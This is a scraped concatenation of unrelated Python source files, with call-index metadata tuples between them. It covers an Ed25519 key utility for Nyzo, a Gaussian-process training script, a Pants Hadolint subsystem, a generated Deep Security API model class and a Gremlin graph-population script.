'(True)'}), '(s3acl_only=True)\n', (45442, 45459), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((45742, 45764), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (45747, 45764), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((45983, 46005), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (45988, 46005), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((46219, 46241), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (46224, 46241), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((46469, 46491), 'test.unit.common.middleware.s3api.test_s3_acl.s3acl', 's3acl', ([], {'s3acl_only': '(True)'}), '(s3acl_only=True)\n', (46474, 46491), False, 'from test.unit.common.middleware.s3api.test_s3_acl import s3acl\n'), ((47243, 47258), 'unittest.main', 'unittest.main', ([], {}), '()\n', (47256, 47258), False, 'import unittest\n'), ((21839, 21853), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (21851, 21853), False, 'from datetime import datetime\n'), ((23225, 23239), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (23237, 23239), False, 'from datetime import datetime\n'), ((25924, 26016), 'swift.common.swob.Request.blank', 'Request.blank', (['"""/bucket/object"""'], {'environ': "{'REQUEST_METHOD': 'PUT'}", 'headers': 'put_headers'}), "('/bucket/object', environ={'REQUEST_METHOD': 'PUT'}, headers=\n put_headers)\n", (25937, 26016), False, 'from swift.common.swob import Request\n'), ((26088, 26102), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (26100, 26102), False, 'from datetime import datetime\n'), ((27897, 27922), 'swift.common.middleware.s3api.etree.fromstring', 'fromstring', (['body', '"""Error"""'], {}), "(body, 'Error')\n", (27907, 27922), False, 'from swift.common.middleware.s3api.etree import fromstring\n'), ((28610, 28635), 'swift.common.middleware.s3api.etree.fromstring', 'fromstring', (['body', '"""Error"""'], {}), "(body, 'Error')\n", (28620, 28635), False, 'from swift.common.middleware.s3api.etree import fromstring\n'), ((29172, 29191), 'swift.common.middleware.s3api.utils.mktime', 'mktime', (['date_header'], {}), '(date_header)\n', (29178, 29191), False, 'from swift.common.middleware.s3api.utils import mktime, S3Timestamp\n'), ((29654, 29690), 'swift.common.middleware.s3api.etree.fromstring', 'fromstring', (['body', '"""CopyObjectResult"""'], {}), "(body, 'CopyObjectResult')\n", (29664, 29690), False, 'from swift.common.middleware.s3api.etree import fromstring\n'), ((46926, 46950), 'os.environ.get', 'os.environ.get', (['"""TZ"""', '""""""'], {}), "('TZ', '')\n", (46940, 46950), False, 'import os\n'), ((47013, 47025), 'time.tzset', 'time.tzset', ([], {}), '()\n', (47023, 47025), False, 'import time\n'), ((47198, 47210), 'time.tzset', 'time.tzset', ([], {}), '()\n', (47208, 47210), False, 'import time\n'), ((26176, 26187), 'time.time', 'time.time', ([], {}), '()\n', (26185, 26187), False, 'import time\n'), ((26201, 26279), 'mock.patch', 'patch', (['"""swift.common.middleware.s3api.utils.time.time"""'], {'return_value': 'timestamp'}), "('swift.common.middleware.s3api.utils.time.time', return_value=timestamp)\n", (26206, 26279), False, 'from mock import patch\n'), ((26497, 26516), 'swift.common.middleware.s3api.utils.mktime', 'mktime', (['date_header'], {}), '(date_header)\n', (26503, 26516), False, 'from swift.common.middleware.s3api.utils import mktime, S3Timestamp\n'), ((27041, 27077), 'swift.common.middleware.s3api.etree.fromstring', 'fromstring', (['body', '"""CopyObjectResult"""'], {}), "(body, 'CopyObjectResult')\n", (27051, 27077), False, 'from swift.common.middleware.s3api.etree import fromstring\n'), ((29216, 29238), 'swift.common.middleware.s3api.utils.S3Timestamp', 'S3Timestamp', (['timestamp'], {}), '(timestamp)\n', (29227, 29238), False, 'from swift.common.middleware.s3api.utils import mktime, S3Timestamp\n'), ((36662, 36763), 'mock.patch', 'patch', (['"""swift.common.middleware.s3api.s3request.get_container_info"""'], {'return_value': "{'status': 204}"}), "('swift.common.middleware.s3api.s3request.get_container_info',\n return_value={'status': 204})\n", (36667, 36763), False, 'from mock import patch\n'), ((36989, 37090), 'mock.patch', 'patch', (['"""swift.common.middleware.s3api.s3request.get_container_info"""'], {'return_value': "{'status': 404}"}), "('swift.common.middleware.s3api.s3request.get_container_info',\n return_value={'status': 404})\n", (36994, 37090), False, 'from mock import patch\n'), ((1894, 1923), 'hashlib.md5', 'hashlib.md5', (['self.object_body'], {}), '(self.object_body)\n', (1905, 1923), False, 'import hashlib\n'), ((24535, 24548), 'swift.common.middleware.s3api.subresource.User', 'User', (['account'], {}), '(account)\n', (24539, 24548), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n'), ((24652, 24675), 'swift.common.middleware.s3api.subresource.Owner', 'Owner', (['account', 'account'], {}), '(account, account)\n', (24657, 24675), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n'), ((25164, 25177), 'swift.common.middleware.s3api.subresource.User', 'User', (['account'], {}), '(account)\n', (25168, 25177), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n'), ((25281, 25304), 'swift.common.middleware.s3api.subresource.Owner', 'Owner', (['account', 'account'], {}), '(account, account)\n', (25286, 25304), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n'), ((26545, 26567), 'swift.common.middleware.s3api.utils.S3Timestamp', 'S3Timestamp', (['timestamp'], {}), '(timestamp)\n', (26556, 26567), False, 'from swift.common.middleware.s3api.utils import mktime, S3Timestamp\n'), ((40715, 40728), 'swift.common.middleware.s3api.subresource.User', 'User', (['account'], {}), '(account)\n', (40719, 40728), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n'), ((40826, 40861), 'swift.common.middleware.s3api.subresource.Owner', 'Owner', (['"""test:tester"""', '"""test:tester"""'], {}), "('test:tester', 'test:tester')\n", (40831, 40861), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n'), ((44648, 44667), 'swift.common.middleware.s3api.subresource.Owner', 'Owner', (['owner', 'owner'], {}), '(owner, owner)\n', (44653, 44667), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n'), ((44479, 44492), 'swift.common.middleware.s3api.subresource.User', 'User', (['account'], {}), '(account)\n', (44483, 44492), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n'), ((44555, 44566), 'swift.common.middleware.s3api.subresource.User', 'User', (['owner'], {}), '(owner)\n', (44559, 44566), False, 'from swift.common.middleware.s3api.subresource import ACL, User, encode_acl, Owner, Grant\n')] |
"""
Eddsa Ed25519 key handling
From
https://github.com/n-y-z-o/nyzoVerifier/blob/b73bc25ba3094abe3470ec070ce306885ad9a18f/src/main/java/co/nyzo/verifier/KeyUtil.java
plus
https://github.com/n-y-z-o/nyzoVerifier/blob/17509f03a7f530c0431ce85377db9b35688c078e/src/main/java/co/nyzo/verifier/util/SignatureUtil.java
"""
# Uses https://github.com/warner/python-ed25519 , c binding, fast
import ed25519
import hashlib
from pynyzo.byteutil import ByteUtil
class KeyUtil:
@staticmethod
def main():
"""Temp test, not to be used"""
signing_key, verifying_key = ed25519.create_keypair()
print("Original private key", ByteUtil.bytes_as_string_with_dashes(signing_key.to_bytes()[:32]))
# signing key has signing + verifying, we keep the first 32 to only get the private part.
print("Original public key", ByteUtil.bytes_as_string_with_dashes(verifying_key.to_bytes()))
@staticmethod
def generateSeed(hashable_keyword: str='') -> bytes:
"""Generate a private key, with optional keyword to get reproducible tests results or later HD Wallet."""
if len(hashable_keyword):
seed = hashlib.sha256(hashable_keyword).digest()
signing_key = ed25519.SigningKey(seed)
else:
signing_key, _ = ed25519.create_keypair()
return signing_key.to_bytes()[:32]
@staticmethod
def private_to_public(private: str) -> str:
"""Temp Test"""
keydata = bytes.fromhex(private)
signing_key = ed25519.SigningKey(keydata)
verifying_key = signing_key.get_verifying_key()
vkey_hex = verifying_key.to_ascii(encoding="hex")
return vkey_hex.decode('utf-8')
@staticmethod
def get_from_private_seed_file(filename: str):
"""returns priv and pub key - as object - from the stored nyzo text id format"""
with open(filename) as f:
nyzo = f.read(80).replace('-', '').encode('utf-8').strip()
signing_key = ed25519.SigningKey(nyzo, encoding="hex")
verifying_key = signing_key.get_verifying_key()
return signing_key, verifying_key
@staticmethod
def get_from_private_seed(seed: str):
"""returns priv and pub key - as object - from an hex seed"""
seed = seed.replace('-', '').encode('utf-8').strip()
signing_key = ed25519.SigningKey(seed, encoding="hex")
verifying_key = signing_key.get_verifying_key()
return signing_key, verifying_key
@staticmethod
def save_to_private_seed_file(filename: str, key: bytes) -> None:
"""Saves the privkey to the nyzo formatted file"""
nyzo_format = ByteUtil.bytes_as_string_with_dashes(key)
with open(filename, 'w') as f:
f.write(nyzo_format)
@staticmethod
def sign_bytes(bytes_to_sign: bytes, private_key: ed25519.SigningKey) -> bytes:
sig = private_key.sign(bytes_to_sign)
return sig
@staticmethod
def signature_is_valid(signature: bytes, signed_bytes: bytes, public_id: bytes) -> bool:
verifying_key = ed25519.VerifyingKey(public_id)
# todo: cache key from id, see https://github.com/n-y-z-o/nyzoVerifier/blob/17509f03a7f530c0431ce85377db9b35688c078e/src/main/java/co/nyzo/verifier/util/SignatureUtil.java
try:
verifying_key.verify(signature, signed_bytes)
# print("signature is good")
return True
except ed25519.BadSignatureError:
# print("signature is bad!")
return False
if __name__ == "__main__":
KeyUtil.main()
# KeyUtil.private_to_public('nyzo-formatted-private-key'.replace('-', ''))
| [
"pynyzo.byteutil.ByteUtil.bytes_as_string_with_dashes",
"hashlib.sha256",
"ed25519.SigningKey",
"ed25519.create_keypair",
"ed25519.VerifyingKey"
]
| [((582, 606), 'ed25519.create_keypair', 'ed25519.create_keypair', ([], {}), '()\n', (604, 606), False, 'import ed25519\n'), ((1512, 1539), 'ed25519.SigningKey', 'ed25519.SigningKey', (['keydata'], {}), '(keydata)\n', (1530, 1539), False, 'import ed25519\n'), ((2341, 2381), 'ed25519.SigningKey', 'ed25519.SigningKey', (['seed'], {'encoding': '"""hex"""'}), "(seed, encoding='hex')\n", (2359, 2381), False, 'import ed25519\n'), ((2651, 2692), 'pynyzo.byteutil.ByteUtil.bytes_as_string_with_dashes', 'ByteUtil.bytes_as_string_with_dashes', (['key'], {}), '(key)\n', (2687, 2692), False, 'from pynyzo.byteutil import ByteUtil\n'), ((3069, 3100), 'ed25519.VerifyingKey', 'ed25519.VerifyingKey', (['public_id'], {}), '(public_id)\n', (3089, 3100), False, 'import ed25519\n'), ((1222, 1246), 'ed25519.SigningKey', 'ed25519.SigningKey', (['seed'], {}), '(seed)\n', (1240, 1246), False, 'import ed25519\n'), ((1290, 1314), 'ed25519.create_keypair', 'ed25519.create_keypair', ([], {}), '()\n', (1312, 1314), False, 'import ed25519\n'), ((1984, 2024), 'ed25519.SigningKey', 'ed25519.SigningKey', (['nyzo'], {'encoding': '"""hex"""'}), "(nyzo, encoding='hex')\n", (2002, 2024), False, 'import ed25519\n'), ((1154, 1186), 'hashlib.sha256', 'hashlib.sha256', (['hashable_keyword'], {}), '(hashable_keyword)\n', (1168, 1186), False, 'import hashlib\n')] |
from argparse import ArgumentParser
import os
import numpy as np
from joblib import dump
from mldftdat.workflow_utils import SAVE_ROOT
from mldftdat.models.gp import *
from mldftdat.data import load_descriptors, filter_descriptors
import yaml
def parse_settings(args):
fname = args.datasets_list[0]
if args.suffix is not None:
fname = fname + '_' + args.suffix
fname = os.path.join(SAVE_ROOT, 'DATASETS', args.functional,
args.basis, args.version, fname)
print(fname)
with open(os.path.join(fname, 'settings.yaml'), 'r') as f:
d = yaml.load(f, Loader=yaml.Loader)
args.gg_a0 = d.get('a0')
args.gg_amin = d.get('amin')
args.gg_facmul = d.get('fac_mul')
def parse_dataset(args, i, val=False):
if val:
fname = args.validation_set[2*i]
n = int(args.validation_set[2*i+1])
else:
fname = args.datasets_list[2*i]
n = int(args.datasets_list[2*i+1])
if args.suffix is not None:
fname = fname + '_' + args.suffix
fname = os.path.join(SAVE_ROOT, 'DATASETS', args.functional,
args.basis, args.version, fname)
print(fname)
X, y, rho_data = load_descriptors(fname)
if val:
# offset in case repeat datasets are used
X, y, rho_data = X[n//2+1:,:], y[n//2+1:], rho_data[:,n//2+1:]
X, y, rho, rho_data = filter_descriptors(X, y, rho_data,
tol=args.density_cutoff)
print(X.shape, n)
if args.randomize:
inds = np.arange(X.shape[0])
np.random.shuffle(inds)
X = X[inds,:]
y = y[inds]
rho = rho[inds]
rho_data = rho_data[:,inds]
return X[::n,:], y[::n], rho[::n], rho_data[:,::n]
def parse_list(lststr, T=int):
return [T(substr) for substr in lststr.split(',')]
def main():
parser = ArgumentParser(description='Trains a GP exchange model')
parser.add_argument('save_file', type=str)
parser.add_argument('feature_file', type=str,
help='serialized FeatureList object in yaml format')
parser.add_argument('datasets_list', nargs='+',
help='pairs of dataset names and inverse sampling densities')
parser.add_argument('basis', metavar='basis', type=str,
help='basis set code')
parser.add_argument('--functional', metavar='functional', type=str, default=None,
help='exchange-correlation functional, HF for Hartree-Fock')
parser.add_argument('-r', '--randomize', action='store_true')
parser.add_argument('-c', '--density-cutoff', type=float, default=1e-4)
#parser.add_argument('-m', '--model-class', type=str, default=None)
#parser.add_argument('-k', '--kernel', help='kernel initialization strategy', type=str, default=None)
parser.add_argument('-s', '--seed', help='random seed', default=0, type=int)
parser.add_argument('-vs', '--validation-set', nargs='+')
parser.add_argument('-d', '--delete-k', action='store_true',
help='Delete L (LL^T=K the kernel matrix) to save disk space. Need to refit when reloading to calculate covariance.')
parser.add_argument('--heg', action='store_true', help='HEG exact constraint')
parser.add_argument('--tail', action='store_true', help='atomic tail exact constraint')
parser.add_argument('-o', '--desc-order', default=None,
help='comma-separated list of descriptor order with no spaces. must start with 0,1.')
parser.add_argument('-l', '--length-scale', default=None,
help='comma-separated list initial length-scale guesses')
parser.add_argument('--length-scale-mul', type=float, default=1.0,
help='Used for automatic length-scale initial guess')
parser.add_argument('-a', '--agpr', action='store_true',
help='Whether to use Additive RBF. If False, use RBF')
parser.add_argument('-as', '--agpr-scale', default=None)
parser.add_argument('-ao', '--agpr-order', default=2, type=int)
parser.add_argument('-an', '--agpr-nsingle', default=1, type=int)
parser.add_argument('-x', '--xed-y-code', default='CHACHIYO', type=str)
parser.add_argument('-on', '--optimize-noise', action='store_true',
help='Whether to optimzie exponent of density noise.')
parser.add_argument('-v', '--version', default='c', type=str,
help='version of descriptor set. Default c')
parser.add_argument('--suffix', default=None, type=str,
help='customize data directories with this suffix')
args = parser.parse_args()
parse_settings(args)
np.random.seed(args.seed)
feature_list = FeatureList.load(args.feature_file)
if args.length_scale is not None:
args.length_scale = parse_list(args.length_scale, T=float)
if args.agpr_scale is not None:
args.agpr_scale = parse_list(args.agpr_scale, T=float)
if args.desc_order is not None:
args.desc_order = parse_list(args.desc_order)
assert len(args.datasets_list) % 2 == 0, 'Need pairs of entries for datasets list.'
assert len(args.datasets_list) != 0, 'Need training data'
nd = len(args.datasets_list) // 2
if args.validation_set is None:
nv = 0
else:
assert len(args.validation_set) % 2 == 0, 'Need pairs of entries for datasets list.'
nv = len(args.validation_set) // 2
X, y, rho, rho_data = parse_dataset(args, 0)
for i in range(1, nd):
Xn, yn, rhon, rho_datan, = parse_dataset(args, i)
X = np.append(X, Xn, axis=0)
y = np.append(y, yn, axis=0)
rho = np.append(rho, rhon, axis=0)
rho_data = np.append(rho_data, rho_datan, axis=1)
if nv != 0:
Xv, yv, rhov, rho_datav = parse_dataset(args, 0, val=True)
for i in range(1, nv):
Xn, yn, rhon, rho_datan, = parse_dataset(args, i, val=True)
Xv = np.append(Xv, Xn, axis=0)
yv = np.append(yv, yn, axis=0)
rhov = np.append(rhov, rhon, axis=0)
rho_datav = np.append(rho_datav, rho_datan, axis=1)
gpcls = DFTGPR
gpr = gpcls.from_settings(X, feature_list, args)
gpr.fit(X, y, add_heg=args.heg, add_tail=args.tail)
#if args.heg:
# gpr.add_heg_limit()
print('FINAL KERNEL', gpr.gp.kernel_)
if nv != 0:
pred = gpr.xed_to_y(gpr.predict(Xv), Xv)
abserr = np.abs(pred - gpr.xed_to_y(yv, Xv))
print('MAE VAL SET', np.mean(abserr))
# Always attach the arguments to the object to keep track of settings.
gpr.args = args
if args.delete_k:
gpr.L_ = None
dump(gpr, args.save_file)
if __name__ == '__main__':
main()
| [
"numpy.mean",
"argparse.ArgumentParser",
"os.path.join",
"yaml.load",
"numpy.append",
"mldftdat.data.load_descriptors",
"mldftdat.data.filter_descriptors",
"numpy.random.seed",
"joblib.dump",
"numpy.arange",
"numpy.random.shuffle"
]
| [((390, 480), 'os.path.join', 'os.path.join', (['SAVE_ROOT', '"""DATASETS"""', 'args.functional', 'args.basis', 'args.version', 'fname'], {}), "(SAVE_ROOT, 'DATASETS', args.functional, args.basis, args.\n version, fname)\n", (402, 480), False, 'import os\n'), ((1042, 1132), 'os.path.join', 'os.path.join', (['SAVE_ROOT', '"""DATASETS"""', 'args.functional', 'args.basis', 'args.version', 'fname'], {}), "(SAVE_ROOT, 'DATASETS', args.functional, args.basis, args.\n version, fname)\n", (1054, 1132), False, 'import os\n'), ((1191, 1214), 'mldftdat.data.load_descriptors', 'load_descriptors', (['fname'], {}), '(fname)\n', (1207, 1214), False, 'from mldftdat.data import load_descriptors, filter_descriptors\n'), ((1374, 1433), 'mldftdat.data.filter_descriptors', 'filter_descriptors', (['X', 'y', 'rho_data'], {'tol': 'args.density_cutoff'}), '(X, y, rho_data, tol=args.density_cutoff)\n', (1392, 1433), False, 'from mldftdat.data import load_descriptors, filter_descriptors\n'), ((1863, 1919), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'description': '"""Trains a GP exchange model"""'}), "(description='Trains a GP exchange model')\n", (1877, 1919), False, 'from argparse import ArgumentParser\n'), ((4702, 4727), 'numpy.random.seed', 'np.random.seed', (['args.seed'], {}), '(args.seed)\n', (4716, 4727), True, 'import numpy as np\n'), ((6664, 6689), 'joblib.dump', 'dump', (['gpr', 'args.save_file'], {}), '(gpr, args.save_file)\n', (6668, 6689), False, 'from joblib import dump\n'), ((593, 625), 'yaml.load', 'yaml.load', (['f'], {'Loader': 'yaml.Loader'}), '(f, Loader=yaml.Loader)\n', (602, 625), False, 'import yaml\n'), ((1539, 1560), 'numpy.arange', 'np.arange', (['X.shape[0]'], {}), '(X.shape[0])\n', (1548, 1560), True, 'import numpy as np\n'), ((1569, 1592), 'numpy.random.shuffle', 'np.random.shuffle', (['inds'], {}), '(inds)\n', (1586, 1592), True, 'import numpy as np\n'), ((5613, 5637), 'numpy.append', 'np.append', (['X', 'Xn'], {'axis': '(0)'}), '(X, Xn, axis=0)\n', (5622, 5637), True, 'import numpy as np\n'), ((5650, 5674), 'numpy.append', 'np.append', (['y', 'yn'], {'axis': '(0)'}), '(y, yn, axis=0)\n', (5659, 5674), True, 'import numpy as np\n'), ((5689, 5717), 'numpy.append', 'np.append', (['rho', 'rhon'], {'axis': '(0)'}), '(rho, rhon, axis=0)\n', (5698, 5717), True, 'import numpy as np\n'), ((5737, 5775), 'numpy.append', 'np.append', (['rho_data', 'rho_datan'], {'axis': '(1)'}), '(rho_data, rho_datan, axis=1)\n', (5746, 5775), True, 'import numpy as np\n'), ((5967, 5992), 'numpy.append', 'np.append', (['Xv', 'Xn'], {'axis': '(0)'}), '(Xv, Xn, axis=0)\n', (5976, 5992), True, 'import numpy as np\n'), ((6006, 6031), 'numpy.append', 'np.append', (['yv', 'yn'], {'axis': '(0)'}), '(yv, yn, axis=0)\n', (6015, 6031), True, 'import numpy as np\n'), ((6047, 6076), 'numpy.append', 'np.append', (['rhov', 'rhon'], {'axis': '(0)'}), '(rhov, rhon, axis=0)\n', (6056, 6076), True, 'import numpy as np\n'), ((6097, 6136), 'numpy.append', 'np.append', (['rho_datav', 'rho_datan'], {'axis': '(1)'}), '(rho_datav, rho_datan, axis=1)\n', (6106, 6136), True, 'import numpy as np\n'), ((532, 568), 'os.path.join', 'os.path.join', (['fname', '"""settings.yaml"""'], {}), "(fname, 'settings.yaml')\n", (544, 568), False, 'import os\n'), ((6503, 6518), 'numpy.mean', 'np.mean', (['abserr'], {}), '(abserr)\n', (6510, 6518), True, 'import numpy as np\n')] |
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from typing import cast
from pants.core.util_rules.config_files import ConfigFilesRequest
from pants.core.util_rules.external_tool import TemplatedExternalTool
from pants.option.custom_types import file_option, shell_str
class Hadolint(TemplatedExternalTool):
options_scope = "hadolint"
name = "hadolint"
help = "A linter for Dockerfiles."
default_version = "v2.8.0"
# TODO: https://github.com/hadolint/hadolint/issues/411 tracks building and releasing
# hadolint for Linux ARM64.
default_known_versions = [
"v2.8.0|macos_x86_64|27985f257a216ecab06a16e643e8cb0123e7145b5d526cfcb4ce7a31fe99f357|2428944",
"v2.8.0|macos_arm64 |27985f257a216ecab06a16e643e8cb0123e7145b5d526cfcb4ce7a31fe99f357|2428944", # same as mac x86
"v2.8.0|linux_x86_64|9dfc155139a1e1e9b3b28f3de9907736b9dfe7cead1c3a0ae7ff0158f3191674|5895708",
]
default_url_template = (
"https://github.com/hadolint/hadolint/releases/download/{version}/hadolint-{platform}"
)
default_url_platform_mapping = {
"macos_arm64": "Darwin-x86_64",
"macos_x86_64": "Darwin-x86_64",
"linux_x86_64": "Linux-x86_64",
}
@classmethod
def register_options(cls, register):
super().register_options(register)
register(
"--skip",
type=bool,
default=False,
help="Don't use Hadolint when running `./pants lint`.",
)
register(
"--args",
type=list,
member_type=shell_str,
help=(
"Arguments to pass directly to Hadolint, e.g. `--hadolint-args='--format json'`.'"
),
)
register(
"--config",
type=file_option,
default=None,
advanced=True,
help=(
"Path to an YAML config file understood by Hadolint "
"(https://github.com/hadolint/hadolint#configure).\n\n"
f"Setting this option will disable `[{cls.options_scope}].config_discovery`. Use "
"this option if the config is located in a non-standard location."
),
)
register(
"--config-discovery",
type=bool,
default=True,
advanced=True,
help=(
"If true, Pants will include all relevant config files during runs "
"(`.hadolint.yaml` and `.hadolint.yml`).\n\n"
f"Use `[{cls.options_scope}].config` instead if your config is in a "
"non-standard location."
),
)
@property
def skip(self) -> bool:
return cast(bool, self.options.skip)
@property
def args(self) -> tuple[str, ...]:
return tuple(self.options.args)
@property
def config(self) -> str | None:
return cast("str | None", self.options.config)
def config_request(self) -> ConfigFilesRequest:
# Refer to https://github.com/hadolint/hadolint#configure for how config files are
# discovered.
return ConfigFilesRequest(
specified=self.config,
specified_option_name=f"[{self.options_scope}].config",
discovery=cast(bool, self.options.config_discovery),
check_existence=[".hadolint.yaml", ".hadolint.yml"],
)
| [
"typing.cast"
]
| [((2848, 2877), 'typing.cast', 'cast', (['bool', 'self.options.skip'], {}), '(bool, self.options.skip)\n', (2852, 2877), False, 'from typing import cast\n'), ((3038, 3077), 'typing.cast', 'cast', (['"""str | None"""', 'self.options.config'], {}), "('str | None', self.options.config)\n", (3042, 3077), False, 'from typing import cast\n'), ((3404, 3445), 'typing.cast', 'cast', (['bool', 'self.options.config_discovery'], {}), '(bool, self.options.config_discovery)\n', (3408, 3445), False, 'from typing import cast\n')] |
# coding: utf-8
"""
Trend Micro Deep Security API
Copyright 2018 - 2020 Trend Micro Incorporated.<br/>Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501
OpenAPI spec version: 12.5.841
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class ApplicationTypeRights(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'can_create_new_application_types': 'bool',
'can_delete_application_types': 'bool',
'can_edit_application_type_properties': 'bool'
}
attribute_map = {
'can_create_new_application_types': 'canCreateNewApplicationTypes',
'can_delete_application_types': 'canDeleteApplicationTypes',
'can_edit_application_type_properties': 'canEditApplicationTypeProperties'
}
def __init__(self, can_create_new_application_types=None, can_delete_application_types=None, can_edit_application_type_properties=None): # noqa: E501
"""ApplicationTypeRights - a model defined in Swagger""" # noqa: E501
self._can_create_new_application_types = None
self._can_delete_application_types = None
self._can_edit_application_type_properties = None
self.discriminator = None
if can_create_new_application_types is not None:
self.can_create_new_application_types = can_create_new_application_types
if can_delete_application_types is not None:
self.can_delete_application_types = can_delete_application_types
if can_edit_application_type_properties is not None:
self.can_edit_application_type_properties = can_edit_application_type_properties
@property
def can_create_new_application_types(self):
"""Gets the can_create_new_application_types of this ApplicationTypeRights. # noqa: E501
Right to create new application types. # noqa: E501
:return: The can_create_new_application_types of this ApplicationTypeRights. # noqa: E501
:rtype: bool
"""
return self._can_create_new_application_types
@can_create_new_application_types.setter
def can_create_new_application_types(self, can_create_new_application_types):
"""Sets the can_create_new_application_types of this ApplicationTypeRights.
Right to create new application types. # noqa: E501
:param can_create_new_application_types: The can_create_new_application_types of this ApplicationTypeRights. # noqa: E501
:type: bool
"""
self._can_create_new_application_types = can_create_new_application_types
@property
def can_delete_application_types(self):
"""Gets the can_delete_application_types of this ApplicationTypeRights. # noqa: E501
Right to delete application types. # noqa: E501
:return: The can_delete_application_types of this ApplicationTypeRights. # noqa: E501
:rtype: bool
"""
return self._can_delete_application_types
@can_delete_application_types.setter
def can_delete_application_types(self, can_delete_application_types):
"""Sets the can_delete_application_types of this ApplicationTypeRights.
Right to delete application types. # noqa: E501
:param can_delete_application_types: The can_delete_application_types of this ApplicationTypeRights. # noqa: E501
:type: bool
"""
self._can_delete_application_types = can_delete_application_types
@property
def can_edit_application_type_properties(self):
"""Gets the can_edit_application_type_properties of this ApplicationTypeRights. # noqa: E501
Right to edit application type properties. # noqa: E501
:return: The can_edit_application_type_properties of this ApplicationTypeRights. # noqa: E501
:rtype: bool
"""
return self._can_edit_application_type_properties
@can_edit_application_type_properties.setter
def can_edit_application_type_properties(self, can_edit_application_type_properties):
"""Sets the can_edit_application_type_properties of this ApplicationTypeRights.
Right to edit application type properties. # noqa: E501
:param can_edit_application_type_properties: The can_edit_application_type_properties of this ApplicationTypeRights. # noqa: E501
:type: bool
"""
self._can_edit_application_type_properties = can_edit_application_type_properties
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(ApplicationTypeRights, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ApplicationTypeRights):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"six.iteritems"
]
| [((5314, 5347), 'six.iteritems', 'six.iteritems', (['self.swagger_types'], {}), '(self.swagger_types)\n', (5327, 5347), False, 'import six\n')] |
from __future__ import print_function # Python 2/3 compatibility
from gremlin_python import statics
from gremlin_python.structure.graph import Graph
from gremlin_python.process.graph_traversal import __
from gremlin_python.process.strategies import *
from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection
#initializing the graph object
graph = Graph()
#creating connection with the remote
remoteConn = DriverRemoteConnection('wss://<endpoint>:8182/gremlin','g')
g = graph.traversal().withRemote(DriverRemoteConnection('wss://<endpoint>:8182/gremlin','g'))
print('Connection created.')
#clearing out all the vertices to start fresh
g.V().drop().iterate()
print('Deleting everything and starting clean.')
#Adding some vertices (nodes)
gerald = g.addV('person').property('age','81').property('first_name','Gerald').property('stays_in','Portland').next()
edith = g.addV('person').property('age','78').property('first_name','Edith').property('stays_in','Portland').next()
peter = g.addV('person').property('age','52').property('first_name','Shane').property('stays_in','Seattle').next()
mary = g.addV('person').property('age','50').property('first_name','Mary').property('stays_in','Seattle').next()
betty = g.addV('person').property('age','19').property('first_name','Betty').property('stays_in','Chicago').next()
print('Added some vertices (nodes).')
#Adding relationships (edges)
edge = g.V().has('first_name', 'Gerald').addE('husband_of').to(g.V().has('first_name', 'Edith')).property('married_since','1947').next()
edge = g.V().has('first_name', 'Edith').addE('wife_of').to(g.V().has('first_name', 'Gerald')).property('married_since','1947').next()
edge = g.V().has('first_name', 'Shane').addE('son_of').to(g.V().has('first_name', 'Gerald')).property('known_since','1964').next()
edge = g.V().has('first_name', 'Gerald').addE('father_of').to(g.V().has('first_name', 'Shane')).property('known_since','1964').next()
edge = g.V().has('first_name', 'Shane').addE('son_of').to(g.V().has('first_name', 'Edith')).property('known_since','1964').next()
edge = g.V().has('first_name', 'Edith').addE('mother_of').to(g.V().has('first_name', 'Shane')).property('known_since','1964').next()
edge = g.V().has('first_name', 'Shane').addE('husband_of').to(g.V().has('first_name', 'Mary')).property('known_since','1989').next()
